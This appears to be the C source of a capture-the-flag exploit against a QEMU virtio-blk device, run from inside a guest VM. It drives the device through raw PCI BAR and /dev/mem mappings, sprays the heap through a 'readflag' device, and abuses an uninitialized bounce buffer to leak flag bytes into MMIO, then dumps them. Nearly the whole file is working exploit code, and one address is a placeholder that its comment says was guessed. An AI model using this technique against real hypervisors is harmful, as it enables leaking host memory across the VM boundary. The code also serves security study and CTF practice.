volatile struct virtq_avail* queue_avail = NULL;
volatile struct virtq_used* queue_used = NULL;
void init_readflag(){
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
    if(mmio_fd < 0){
        ERR("Open readflag");
    }
    readflag_mmio = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if(readflag_mmio == (volatile void*)-1){
        ERR("mmap mmio_mem");
    }
    close(mmio_fd);
    puts("readflag init done");
}
uint8_t mmio_read8(void* addr){
    return *(volatile uint8_t*)addr;
}

uint16_t mmio_read16(void* addr){
    return *(volatile uint16_t*)addr;
}

uint32_t mmio_read32(void* addr){
    return *(volatile uint32_t*)addr;
}

uint64_t mmio_read64(void* addr){
    return *(volatile uint64_t*)addr;
}

void mmio_write8(void* addr, uint8_t val){
    *(volatile uint8_t*)addr = val;
}

void mmio_write16(void* addr, uint16_t val){
    *(volatile uint16_t*)addr = val;
}

void mmio_write32(void* addr, uint32_t val){
    *(volatile uint32_t*)addr = val;
}

void mmio_write64(void* addr, uint64_t val){
    *(volatile uint64_t*)addr = val;
}

void mb(){
    asm volatile("mfence":::"memory");
}
void init_virtio() {
    int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
    if(fd < 0){
        ERR("Open virtio config");
    }
    struct virtio_pci_cap cap;
    char* config = malloc(0x1000);
    int bytes_read = read(fd, config, 0x1000);
    if(bytes_read < 0){
        ERR("Read virtio config");
    }
    close(fd);

    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
    if(fd < 0){
        ERR("Open virtio resource4");
    }
    virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(virtio_mmio == (volatile void*)-1){
        ERR("mmap virtio mem");
    }
    close(fd);

    // walk the PCI capability list; the offset of the first capability is at config+0x34
    u8 cap_ptr = *(u8*)(config+0x34);
    while(cap_ptr != 0){
        if(config[cap_ptr] != 0x9){ // only vendor-specific capabilities (PCI_CAP_ID_VNDR)
            cap_ptr = *(u8*)(config+cap_ptr+1);
            continue;
        }
        memcpy(&cap, config+cap_ptr, sizeof(cap));
        print_cap(&cap);
        switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }
        cap_ptr = cap.cap_next;
    }
    free(config);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    mmio_write32(&common_cfg->device_feature_select, 0);
    printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->device_feature_select, 1);
    printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->driver_feature_select, 0);
    printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
    mmio_write32(&common_cfg->driver_feature_select, 1);
    printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

    struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
    printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
    printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
    printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
    printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
    printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
    printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
    printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

    // reset the device, then negotiate an empty feature set
    mmio_write8(&common_cfg->device_status, 0);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write32(&common_cfg->driver_feature_select, 0);
    mmio_write32(&common_cfg->driver_feature, 0); // disable all features
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);

    // allocate DMA memory: map /dev/mem at a fixed address equal to the file
    // offset, so virtual addresses in this region equal guest-physical ones
    int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if(dma_fd < 0){
        ERR("Open dma");
    }
    dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
    if(dma_mem == (volatile void*)-1){
        ERR("mmap dma mem");
    }
    *(volatile uint32_t*)dma_mem = 0x12345678;
    printf("%x\n", *(volatile uint32_t*)dma_mem);
    *(volatile uint32_t*)dma_mem = 0;
    printf("dma_mem: %p\n", dma_mem);
    dma_data = dma_mem + 0x1000;
    queue_desc = (struct virtq_desc*)dma_mem;       // 16 descriptors * 16 bytes = 0x100
    queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
    queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

    // set up queue 0
    mmio_write16(&common_cfg->queue_select, 0);
    mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
    mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
    mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
    mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
    mmio_write16(&common_cfg->queue_enable, 1);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    puts("virtio init done");
}
void spray(){
    // each write makes the device malloc(i) bytes, fread the flag in, and
    // free the buffer, spraying flag bytes across many heap chunk sizes
    for(int i = 0xfff; i > 0x28; i-=4){
        mmio_write32((void*)readflag_mmio, i);
    }
}
void hexdump(void* addr, size_t size){
    // dump 4 bytes at a time, printing only printable ASCII
    for(size_t i = 0; i < size; i+=4){
        uint32_t val = *(volatile uint32_t*)((char*)addr+i);
        for(int j = 0; j < 4; j++){
            uint8_t chr = (val >> (j*8)) & 0xff;
            if(chr >= 0x20 && chr <= 0x7e){
                putchar(chr);
            }else{
                putchar('?');
            }
        }
    }
    putchar('\n');
}
/* Guest-physical address that the device-writable descriptor points at.
 * It must land in MMIO (not RAM) so that QEMU takes the bounce-buffer
 * path; here we aim at the virtio BAR4 common-config window. The exact
 * value was elided in the original listing, so this constant is a
 * placeholder assumption: read the BAR base from the device's
 * /sys/.../resource file and add the common-cfg capability offset. */
#define VIRTIO_COMMON_CFG_PHYS 0xfe000000ULL

int main(){
    setbuf(stdout, NULL);
    init_readflag();
    init_virtio();

    // an invalid type makes the device answer VIRTIO_BLK_S_UNSUPP,
    // but req->in_len has already been recorded by then
    volatile struct virtio_blk_req* req = (struct virtio_blk_req*)dma_data;
    req->type = 0xffffffffu;
    req->sector = 0;
    req->reserved = 0;

    // desc[0]: device-readable request header (VA == guest PA in this mapping)
    queue_desc[0].addr = (size_t)req;
    queue_desc[0].len = 0x10;
    queue_desc[0].flags = VIRTQ_DESC_F_NEXT;
    queue_desc[0].next = 1;
    // desc[1]: device-writable buffer pointing into MMIO -> bounce-buffer path
    queue_desc[1].addr = VIRTIO_COMMON_CFG_PHYS;
    queue_desc[1].len = 0xfff;
    queue_desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
    queue_desc[1].next = 2;
    // desc[2]: status byte
    queue_desc[2].addr = (size_t)dma_data + 0xa00;
    queue_desc[2].len = 1;
    queue_desc[2].flags = VIRTQ_DESC_F_WRITE;
    queue_desc[2].next = 0;

    queue_avail->flags = 1; // no interrupt needed
    queue_avail->ring[0] = 0;
    queue_avail->idx = 1;
    mb();
    mmio_write8((void*)virtio_isr_mmio, 1);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    // doorbell address for queue 0 (cf. the notify-capability formula above)
    void* notify_addr = (void*)((uintptr_t)virtio_notify_mmio + mmio_read32((void*)&virtio_notify_mmio->cap.offset) + mmio_read16(&common_cfg->queue_notify_off) * mmio_read32((void*)&virtio_notify_mmio->notify_off_multiplier));
    puts("--------------------------------");
    // fill freed heap chunks (and thus the future bounce buffer) with flag bytes
    for(int i = 0; i < 0x100; i+=4){
        spray();
    }
    // kick the queue: on completion, the uninitialized bounce buffer is
    // written back into the common configuration region
    mmio_write16(notify_addr, 0);
    puts("--------------------------------");
    hexdump((char*)virtio_common_mmio + 0x000, 0x100);

    munmap((void*)dma_mem, 0x3000);
    munmap((void*)virtio_mmio, 0x4000);
    munmap((void*)readflag_mmio, 0x1000);
}